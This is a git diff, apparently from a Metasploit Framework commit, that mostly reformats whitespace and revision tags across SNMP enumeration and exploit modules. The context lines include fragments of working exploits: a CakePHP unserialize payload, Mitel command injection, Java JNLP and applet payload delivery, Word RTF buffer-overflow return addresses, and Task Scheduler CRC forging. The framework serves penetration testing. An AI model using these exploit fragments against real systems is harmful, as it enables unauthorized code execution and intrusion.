http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')
|
http_totalBGIRequests = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.21.0')
|
||||||
if http_totalBGIRequests.to_s !~ /Null/
|
if http_totalBGIRequests.to_s !~ /Null/
|
||||||
iis.push([["BGIRequests : "],[http_totalBGIRequests]])
|
iis.push([["BGIRequests : "],[http_totalBGIRequests]])
|
||||||
end
|
end
|
||||||
|
|
||||||
http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')
|
http_totalNotFoundErrors = snmp.get_value('1.3.6.1.4.1.311.1.7.3.1.22.0')
|
||||||
if http_totalNotFoundErrors.to_s !~ /Null/
|
if http_totalNotFoundErrors.to_s !~ /Null/
|
||||||
iis.push([["NotFoundErrors : "],[http_totalNotFoundErrors]])
|
iis.push([["NotFoundErrors : "],[http_totalNotFoundErrors]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not iis.empty?
|
if not iis.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("IIS server information")
|
print_status("IIS server information")
|
||||||
print_line('')
|
print_line('')
|
||||||
iis.each {|a,b| print_line("#{a} #{b}")}
|
iis.each {|a,b| print_line("#{a} #{b}")}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
storage_information = []
|
storage_information = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.2.1.25.2.3.1.1","1.3.6.1.2.1.25.2.3.1.2","1.3.6.1.2.1.25.2.3.1.3","1.3.6.1.2.1.25.2.3.1.4","1.3.6.1.2.1.25.2.3.1.5","1.3.6.1.2.1.25.2.3.1.6"]) do |index,type,descr,allocation,size,used|
|
snmp.walk(["1.3.6.1.2.1.25.2.3.1.1","1.3.6.1.2.1.25.2.3.1.2","1.3.6.1.2.1.25.2.3.1.3","1.3.6.1.2.1.25.2.3.1.4","1.3.6.1.2.1.25.2.3.1.5","1.3.6.1.2.1.25.2.3.1.6"]) do |index,type,descr,allocation,size,used|
|
||||||
|
@ -670,16 +670,16 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])
|
storage_information.push([[descr.value],[index.value],[type.value],[allocation.value],[size.value],[used.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not storage_information.empty?
|
if not storage_information.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Storage information")
|
print_status("Storage information")
|
||||||
print_line('')
|
print_line('')
|
||||||
storage_information.each {|a,b,c,d,e,f|
|
storage_information.each {|a,b,c,d,e,f|
|
||||||
|
|
||||||
e = number_to_human_size(e,d)
|
e = number_to_human_size(e,d)
|
||||||
f = number_to_human_size(f,d)
|
f = number_to_human_size(f,d)
|
||||||
|
|
||||||
print_line("#{a}")
|
print_line("#{a}")
|
||||||
print_line("\tDevice id : #{b}")
|
print_line("\tDevice id : #{b}")
|
||||||
print_line("\tFilesystem type : #{c}")
|
print_line("\tFilesystem type : #{c}")
|
||||||
|
@ -689,23 +689,23 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
}
|
}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
|
||||||
file_system = []
|
file_system = []
|
||||||
|
|
||||||
hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')
|
hrFSIndex = snmp.get_value('1.3.6.1.2.1.25.3.8.1.1.1')
|
||||||
if hrFSIndex.to_s !~ /Null/
|
if hrFSIndex.to_s !~ /Null/
|
||||||
file_system.push([["Index : "],[hrFSIndex]])
|
file_system.push([["Index : "],[hrFSIndex]])
|
||||||
end
|
end
|
||||||
|
|
||||||
hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')
|
hrFSMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.2.1')
|
||||||
if hrFSMountPoint.to_s !~ /Null/
|
if hrFSMountPoint.to_s !~ /Null/
|
||||||
file_system.push([["Mount point : "],[hrFSMountPoint]])
|
file_system.push([["Mount point : "],[hrFSMountPoint]])
|
||||||
end
|
end
|
||||||
|
|
||||||
hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')
|
hrFSRemoteMountPoint = snmp.get_value('1.3.6.1.2.1.25.3.8.1.3.1')
|
||||||
if hrFSRemoteMountPoint.to_s !~ /Null/
|
if hrFSRemoteMountPoint.to_s !~ /Null/
|
||||||
if hrFSRemoteMountPoint.empty?
|
if hrFSRemoteMountPoint.empty?
|
||||||
|
@ -713,7 +713,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
file_system.push([["Remote mount point : "],[hrFSRemoteMountPoint]])
|
file_system.push([["Remote mount point : "],[hrFSRemoteMountPoint]])
|
||||||
end
|
end
|
||||||
|
|
||||||
hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')
|
hrFSType = snmp.get_value('1.3.6.1.2.1.25.3.8.1.4.1')
|
||||||
|
|
||||||
case hrFSType.to_s
|
case hrFSType.to_s
|
||||||
|
@ -766,7 +766,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
else
|
else
|
||||||
hrFSType = "Null"
|
hrFSType = "Null"
|
||||||
end
|
end
|
||||||
|
|
||||||
if hrFSType.to_s !~ /Null/
|
if hrFSType.to_s !~ /Null/
|
||||||
file_system.push([["Type : "],[hrFSType]])
|
file_system.push([["Type : "],[hrFSType]])
|
||||||
end
|
end
|
||||||
|
@ -775,12 +775,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if hrFSAccess.to_s !~ /Null/
|
if hrFSAccess.to_s !~ /Null/
|
||||||
file_system.push([["Access : "],[hrFSAccess]])
|
file_system.push([["Access : "],[hrFSAccess]])
|
||||||
end
|
end
|
||||||
|
|
||||||
hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')
|
hrFSBootable = snmp.get_value('1.3.6.1.2.1.25.3.8.1.6.1')
|
||||||
if hrFSBootable.to_s !~ /Null/
|
if hrFSBootable.to_s !~ /Null/
|
||||||
file_system.push([["Bootable : "],[hrFSBootable]])
|
file_system.push([["Bootable : "],[hrFSBootable]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not file_system.empty?
|
if not file_system.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("File system information")
|
print_status("File system information")
|
||||||
|
@ -795,7 +795,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
device_information = []
|
device_information = []
|
||||||
|
|
||||||
snmp.walk(["1.3.6.1.2.1.25.3.2.1.1","1.3.6.1.2.1.25.3.2.1.2","1.3.6.1.2.1.25.3.2.1.5","1.3.6.1.2.1.25.3.2.1.3"]) do |index,type,status,descr|
|
snmp.walk(["1.3.6.1.2.1.25.3.2.1.1","1.3.6.1.2.1.25.3.2.1.2","1.3.6.1.2.1.25.3.2.1.5","1.3.6.1.2.1.25.3.2.1.3"]) do |index,type,status,descr|
|
||||||
|
|
||||||
case type.value.to_s
|
case type.value.to_s
|
||||||
when /^1.3.6.1.2.1.25.3.1.1$/
|
when /^1.3.6.1.2.1.25.3.1.1$/
|
||||||
type.value = "Other"
|
type.value = "Other"
|
||||||
|
@ -836,7 +836,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
else
|
else
|
||||||
type.value = "unknown"
|
type.value = "unknown"
|
||||||
end
|
end
|
||||||
|
|
||||||
case status.value
|
case status.value
|
||||||
when 1
|
when 1
|
||||||
status.value = "unknown"
|
status.value = "unknown"
|
||||||
|
@ -856,8 +856,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
device_information.push([[index.value],[type.value],[status.value],[descr.value]])
|
device_information.push([[index.value],[type.value],[status.value],[descr.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not device_information.empty?
|
if not device_information.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Device information")
|
print_status("Device information")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -876,7 +876,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
software_list.push([[index.value],[name.value]])
|
software_list.push([[index.value],[name.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not software_list.empty?
|
if not software_list.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Software components")
|
print_status("Software components")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -900,11 +900,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
else
|
else
|
||||||
status.value = "unknown"
|
status.value = "unknown"
|
||||||
end
|
end
|
||||||
|
|
||||||
process_interfaces.push([[id.value],[status.value],[name.value],[path.value],[param.value]])
|
process_interfaces.push([[id.value],[status.value],[name.value],[path.value],[param.value]])
|
||||||
end
|
end
|
||||||
|
|
||||||
if not process_interfaces.empty?
|
if not process_interfaces.empty?
|
||||||
print_line('')
|
print_line('')
|
||||||
print_status("Process interfaces")
|
print_status("Process interfaces")
|
||||||
print_line('')
|
print_line('')
|
||||||
|
@ -912,7 +912,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_line('')
|
print_line('')
|
||||||
process_interfaces.each {|a,b,c,d,e| print_line(sprintf("%10s %10s %22s %30s %s",a,b,c,d,e))}
|
process_interfaces.each {|a,b,c,d,e| print_line(sprintf("%10s %10s %22s %30s %s",a,b,c,d,e))}
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
|
@ -935,7 +935,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def number_to_human_size(size,unit)
|
def number_to_human_size(size,unit)
|
||||||
size = size.first.to_i * unit.first.to_i
|
size = size.first.to_i * unit.first.to_i
|
||||||
|
|
||||||
if size < 1024
|
if size < 1024
|
||||||
"#{size} bytes"
|
"#{size} bytes"
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id: $
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'SNMP Set Module',
|
'Name' => 'SNMP Set Module',
|
||||||
'Version' => '$Revision: $',
|
'Version' => '$Revision$',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module, similar to snmpset tool, uses the SNMP SET request
|
This module, similar to snmpset tool, uses the SNMP SET request
|
||||||
to set information on a network entity. A OID (numeric notation)
|
to set information on a network entity. A OID (numeric notation)
|
||||||
|
|
|
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_error
|
print_error
|
||||||
|
|
||||||
@use_static = true
|
@use_static = true
|
||||||
else
|
else
|
||||||
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
|
cp = "#{datastore["JavaCache"]}:" + File.join(Msf::Config.data_directory, "java")
|
||||||
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
|
compile( [ "#{datastore["APPLETNAME"]}" ] , [ applet_code ], [ "-classpath", "#{cp}" ])
|
||||||
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
|
applet_file = File.join(datastore["JavaCache"], "#{datastore["APPLETNAME"]}.class")
|
||||||
|
@ -241,20 +241,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def applet_code
|
def applet_code
|
||||||
applet = %Q|
|
applet = <<-EOS
|
||||||
import java.applet.*;
|
import java.applet.*;
|
||||||
import metasploit.*;
|
import metasploit.*;
|
||||||
|
|
||||||
public class #{datastore["APPLETNAME"]} extends Applet {
|
public class #{datastore["APPLETNAME"]} extends Applet {
|
||||||
public void init() {
|
public void init() {
|
||||||
try {
|
try {
|
||||||
Payload.main(null);
|
Payload.main(null);
|
||||||
} catch (Exception ex) {
|
} catch (Exception ex) {
|
||||||
//ex.printStackTrace();
|
//ex.printStackTrace();
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
EOS
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -22,12 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
CakePHP is a popular PHP framework for building web applications.
|
CakePHP is a popular PHP framework for building web applications.
|
||||||
The Security component of CakePHP is vulnerable to an unserialize attack which
|
The Security component of CakePHP is vulnerable to an unserialize attack which
|
||||||
could be abused to allow unauthenticated attackers to execute arbitrary
|
could be abused to allow unauthenticated attackers to execute arbitrary
|
||||||
code with the permissions of the webserver.
|
code with the permissions of the webserver.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'tdz',
|
'tdz',
|
||||||
'Felix Wilhelm', # poc
|
'Felix Wilhelm', # poc
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
p << 's:3:"Foo";s:'
|
p << 's:3:"Foo";s:'
|
||||||
p << len.to_s()
|
p << len.to_s()
|
||||||
p << ':"<? '
|
p << ':"<? '
|
||||||
p << payload.encoded
|
p << payload.encoded
|
||||||
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
|
p << ' ?>";}s:7:"__paths";a:0:{}s:9:"__objects";a:0:{}}'
|
||||||
|
|
||||||
#rot13 and urlencode
|
#rot13 and urlencode
|
||||||
|
@ -107,13 +107,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'uri' => datastore['URI'],
|
'uri' => datastore['URI'],
|
||||||
'method' => "POST",
|
'method' => "POST",
|
||||||
'ctype' => 'application/x-www-form-urlencoded',
|
'ctype' => 'application/x-www-form-urlencoded',
|
||||||
'data' => data
|
'data' => data
|
||||||
}, 5)
|
}, 5)
|
||||||
|
|
||||||
print_status("Sending exploit request 2")
|
print_status("Sending exploit request 2")
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => datastore['URI'],
|
'uri' => datastore['URI'],
|
||||||
'method' => "POST",
|
'method' => "POST",
|
||||||
'ctype' => 'application/x-www-form-urlencoded',
|
'ctype' => 'application/x-www-form-urlencoded',
|
||||||
|
|
|
@ -21,17 +21,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
|
'Name' => 'Mitel Audio and Web Conferencing Command Injection',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a command injection flaw within the Mitel
|
This module exploits a command injection flaw within the Mitel
|
||||||
Audio and Web Conferencing web interface.
|
Audio and Web Conferencing web interface.
|
||||||
},
|
},
|
||||||
'Author' => [ 'hdm' ],
|
'Author' => [ 'hdm' ],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
|
||||||
['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
|
['URL', 'http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-14'],
|
||||||
['OSVDB', '69934'],
|
['OSVDB', '69934'],
|
||||||
# ['CVE', ''],
|
# ['CVE', ''],
|
||||||
# ['BID', '']
|
# ['BID', '']
|
||||||
],
|
],
|
||||||
'Platform' => ['unix', 'linux'],
|
'Platform' => ['unix', 'linux'],
|
||||||
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
print_status("Attempting to execute our command..")
|
print_status("Attempting to execute our command..")
|
||||||
|
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
'uri' => datastore['URIPATH'],
|
'uri' => datastore['URIPATH'],
|
||||||
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
|
print_error("Unexpected reply: #{res.code} #{res.body[0,500].inspect}...")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
handler
|
handler
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id: $
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
},
|
},
|
||||||
'Author' => ['chao-mu'],
|
'Author' => ['chao-mu'],
|
||||||
'License' => BSD_LICENSE,
|
'License' => BSD_LICENSE,
|
||||||
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['OSVDB' => '50421'],
|
['OSVDB' => '50421'],
|
||||||
|
|
|
@ -1,5 +1,5 @@
|
||||||
##
|
##
|
||||||
# $Id: java_basicservice_impl.rb 10488 2010-09-26 23:55:03Z egypt $
|
# $Id$
|
||||||
##
|
##
|
||||||
|
|
||||||
##
|
##
|
||||||
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Matthias Kaiser', # Discovery, PoC, metasploit module
|
'Matthias Kaiser', # Discovery, PoC, metasploit module
|
||||||
'egypt' # metasploit module
|
'egypt' # metasploit module
|
||||||
],
|
],
|
||||||
'Version' => '$Revision: 10488 $',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'CVE', '2010-3563' ],
|
[ 'CVE', '2010-3563' ],
|
||||||
|
@ -87,24 +87,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
|
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
|
||||||
|
|
||||||
when /init.jnlp/
|
when /init.jnlp/
|
||||||
init = %Q|<?xml version="1.0" encoding="UTF-8"?>
|
init = <<-EOS
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
<jnlp href="#{jpath}/init.jnlp" version="1">
|
<jnlp href="#{jpath}/init.jnlp" version="1">
|
||||||
#{jnlp_info}
|
#{jnlp_info}
|
||||||
<application-desc main-class="BasicServiceExploit">
|
<application-desc main-class="BasicServiceExploit">
|
||||||
<argument>#{jpath}</argument>
|
<argument>#{jpath}</argument>
|
||||||
</application-desc>
|
</application-desc>
|
||||||
</jnlp>
|
</jnlp>
|
||||||
|
|
EOS
|
||||||
print_status("Sending init.jnlp")
|
print_status("Sending init.jnlp")
|
||||||
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
|
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
|
||||||
|
|
||||||
when /exploit.jnlp/
|
when /exploit.jnlp/
|
||||||
expl = %Q|<?xml version="1.0" encoding="UTF-8"?>
|
expl = <<-EOS
|
||||||
<jnlp href="#{jpath}/exploit.jnlp" version="1">
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
#{jnlp_info}
|
<jnlp href="#{jpath}/exploit.jnlp" version="1">
|
||||||
<application-desc main-class="Exploit"/>
|
#{jnlp_info}
|
||||||
</jnlp>
|
<application-desc main-class="Exploit"/>
|
||||||
|
|
</jnlp>
|
||||||
|
EOS
|
||||||
print_status("Sending exploit.jnlp")
|
print_status("Sending exploit.jnlp")
|
||||||
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
|
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
|
||||||
|
|
||||||
|
@ -129,15 +131,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def jnlp_info
|
def jnlp_info
|
||||||
%Q|<information>
|
buf <<-EOS
|
||||||
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
|
<information>
|
||||||
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
|
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
|
||||||
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
|
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
|
||||||
</information>
|
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
|
||||||
<resources>
|
</information>
|
||||||
<java version="1.6+"/>
|
<resources>
|
||||||
<jar href="#{get_uri}/exploit.jar"/>
|
<java version="1.6+"/>
|
||||||
</resources>
|
<jar href="#{get_uri}/exploit.jar"/>
|
||||||
|
|
</resources>
|
||||||
|
EOS
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -38,9 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
|
.NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not
|
||||||
opt-in to ASLR. As such, this module should be reliable on all Windows
|
opt-in to ASLR. As such, this module should be reliable on all Windows
|
||||||
versions.
|
versions.
|
||||||
|
|
||||||
The WMI Adminsitrative Tools are a standalone download & install (linked in the
|
The WMI Adminsitrative Tools are a standalone download & install (linked in the
|
||||||
references).
|
references).
|
||||||
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
|
|
|
@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
|
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => 'July 1 2009',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
|
|
|
@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
|
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
|
||||||
],
|
],
|
||||||
'Privileged' => false,
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => 'Dec 25 2009',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
|
|
|
@ -23,12 +23,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a stack-based buffer overflow in the handling of the
|
This module exploits a stack-based buffer overflow in the handling of the
|
||||||
'pFragments' shape property within the Microsoft Word RTF parser. All versions
|
'pFragments' shape property within the Microsoft Word RTF parser. All versions
|
||||||
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
|
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
|
||||||
MS10-087 bulletin are vulnerable.
|
MS10-087 bulletin are vulnerable.
|
||||||
|
|
||||||
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
|
This module does not attempt to exploit the vulnerability via Microsoft Outlook.
|
||||||
|
|
||||||
The Microsoft Word RTF parser was only used by default in versions of Microsoft
|
The Microsoft Word RTF parser was only used by default in versions of Microsoft
|
||||||
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
|
Word itself prior to Office 2007. With the release of Office 2007, Microsoft
|
||||||
began using the Word RTF parser, by default, to handle rich-text messages within
|
began using the Word RTF parser, by default, to handle rich-text messages within
|
||||||
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
|
Outlook as well. It was possible to configure Outlook 2003 and earlier to use
|
||||||
|
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Stick fake SEH frames here and there ;)
|
# Stick fake SEH frames here and there ;)
|
||||||
if target.name == "Automatic"
|
if target.name == "Automatic"
|
||||||
targets.each { |t|
|
targets.each { |t|
|
||||||
next if t.name !~ /Windows/i
|
next if t.name !~ /Windows/i
|
||||||
|
|
||||||
add_target(rest, t)
|
add_target(rest, t)
|
||||||
}
|
}
|
||||||
|
@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
content << "}"
|
content << "}"
|
||||||
|
|
||||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||||
file_create(content)
|
file_create(content)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -165,7 +165,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
if target.name == "Automatic"
|
if target.name == "Automatic"
|
||||||
targets.each { |t|
|
targets.each { |t|
|
||||||
next if t.name !~ /Windows/i
|
next if t.name !~ /Windows/i
|
||||||
|
|
||||||
add_target(data, t)
|
add_target(data, t)
|
||||||
}
|
}
|
||||||
|
|
|
@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[
|
[
|
||||||
[ 'Nuance PDF Reader v6.x (XP SP3)', { 'Ret' => 0x10191579, 'Offset' => 1290 } ] #ppr - pluscore.dll
|
[ 'Nuance PDF Reader v6.x (XP SP3)', { 'Ret' => 0x10191579, 'Offset' => 1290 } ] #ppr - pluscore.dll
|
||||||
],
|
],
|
||||||
|
'DisclosureDate' => 'Oct 08 2010',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
|
|
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super( update_info( info,
|
super( update_info( info,
|
||||||
'Name' => 'Schelevator',
|
'Name' => 'Schelevator',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
|
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
|
||||||
NOTE: Thanks to webDEViL for the information about disable/enable.
|
NOTE: Thanks to webDEViL for the information about disable/enable.
|
||||||
},
|
},
|
||||||
|
@ -324,7 +324,7 @@ class Metasploit3 < Msf::Post
|
||||||
|
|
||||||
crc = crc32(data[0, data.length - 12])
|
crc = crc32(data[0, data.length - 12])
|
||||||
data[-12, 4] = [crc].pack('V')
|
data[-12, 4] = [crc].pack('V')
|
||||||
|
|
||||||
data[-12, 12].unpack('C*').reverse.each { |b|
|
data[-12, 12].unpack('C*').reverse.each { |b|
|
||||||
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
|
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue